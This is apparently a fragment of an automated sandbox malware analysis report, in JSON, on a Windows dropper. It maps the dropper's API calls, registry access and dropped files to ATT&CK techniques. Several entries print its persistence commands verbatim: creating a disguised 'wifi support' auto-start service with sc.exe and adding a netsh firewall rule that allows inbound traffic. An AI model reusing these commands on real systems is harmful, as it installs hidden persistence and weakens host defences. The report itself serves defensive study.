\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000008b0165370300000044e56c01e5a05617f01400008ce56c01c0e46c01590000000300000048e46c0150e46c0118e66c0150b8526b41cb6e7dfeffffff98e56c016fe4516b8b01653798e56c017ce4516b060000000000796a010000008fe4516b3333ff040600000003000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e56c01000000008e00000044e66c01feffffffcce56c01cf005a77d6005a7751e42f768e0000004700000044e66c0100000000a0e56c010000000008e66c01 (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360072d4531444de6c016d821976b47a260004010000 (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000630063003600660033003600340032006200350038003700340065006200320030003700350062003300330030003600310061006200350034006300640038003300610062003600610062003300640061003800620037003900310065006600660065002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b59776dc92f76d8eb4b76ac011e0000001e0000000000000000000100f700c6000000000000000000000000000000000000000200f200c6000000000000000000000008701e0000000000200000000000000000000000 (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001e0008da2800000000003e00003e340000c030dc280038f02800508d2800f001000000001e000400000008da2800acee6c010464597738011e00e063597731ef2f760000000000001e0010da28006dd16676baa0aa146cae4d760000000000000000f401000038f02800d82f1e000100000000001e0050011e000c00000010da2800d82f1e000200000218000000f62100d7820000000000000000000000030000004cee6c01820000007f07000000000000f62100d702000000c0756e7638f0280000000000c0756e7668ee6c01e8301e0000000000d82f1e00c0ee6c01ff2b5977 (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000005fc59a80300000044e56c01e5a05617181500008ce56c01c0e46c015b0000000300000048e46c0150e46c0118e66c0150b8526b41cb6e7dfeffffff98e56c016fe4516b05fc59a898e56c017ce4516b820500000000796a010000008fe4516b3333ff048205000004000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001e0060fb2800000000003e00003e340000c088fd280000012900282a2900f001000000001e000400000060fb2800acee6c010464597738011e00e063597731ef2f760000000000001e0068fb28006dd16676baa0aa146cae4d760000000000000000e000000000012900d82f1e000100000000001e0050011e000c00000068fb2800d82f1e000200000218000000d70000d7820000000000000000000000030000004cee6c018200000057000000000000001430002402000000c0756e76488f290000000000c0756e7668ee6c0104301e0000000000d82f1e00c0ee6c01ff2b5977 (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000313a839a0300000044e56c01e5a056178c1400008ce56c01c0e46c015b0000000300000048e46c0150e46c0118e66c0150b8526b41cb6e7dfeffffff98e56c016fe4516b313a839a98e56c017ce4516b820500000000796a010000008fe4516b3333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005184)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005184)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00005700)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"IsWow64Process\" with parameter \"5184\" - (UID: 00000000-00005184)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005184)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"mdzgxwae.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005856)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005856)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00006096-37930-272-0040B211", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00005184)\n \"cmd.exe\" called \"FindFirstFileW\" with parameter C:\\ (UID: 00000000-00005412)\n \"cmd.exe\" called \"FindNextFileW\" with parameter mdzgxwae.exe (UID: 00000000-00005412)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"sc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"mdzgxwae.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"mdzgxwae.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"svchost.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006000000dae0356f26ec00000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f12db767cd33b7670000000000000000\" - (UID: 00000000-00005700)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"1661d0\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"1111992\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005856)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00005856)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"mdzgxwae.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\CYGQXRTX\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\mdzgxwae.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\mdzgxwae.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"mdzgxwae.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\mdzgxwae.exe]- [targetUID: 00000000-00005184]\n \"MDZGXWAE.EXE.67B73C1B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"mdzgxwae.exe.67B73C1A.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe\" has section name .text with entropy \"6.63010280368\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe\" has section name .text with entropy \"7.97285529131\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe\" has section name .reloc with entropy \"6.22149605003\"\n \"mdzgxwae.exe\" has section name .text with entropy \"6.63010280368\"\n \"mdzgxwae.exe\" has section name .text with entropy \"7.97285529131\"\n \"mdzgxwae.exe\" has section name .reloc with entropy \"6.22149605003\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 80 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00005184)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (UID: 00000000-00005184)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\cygqxrtx\\\\\" (UID: 00000000-00005476)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\mdzgxwae.exe\" %WINDIR%\\\\system32\\\\cygqxrtx\\\\\" (UID: 00000000-00005412)\n Spawned process \"sc.exe\" with commandline \"create cygqxrtx binPath= \"%WINDIR%\\\\system32\\\\cygqxrtx\\\\mdzgxwae.exe /d\\\\\"C:\\\\6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00005352)\n Spawned process \"sc.exe\" with commandline \"description cygqxrtx \"wifi internet conection\"\" (UID: 00000000-00005780)\n Spawned process \"sc.exe\" with commandline \"start cygqxrtx\" (UID: 00000000-00005912)\n Spawned process \"mdzgxwae.exe\" with commandline \"/d\"C:\\\\6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\"\" (UID: 00000000-00006096)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00005856)\n Spawned process \"svchost.exe\" (UID: 00000000-00005700)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 572)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 572)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 572)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 300)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" 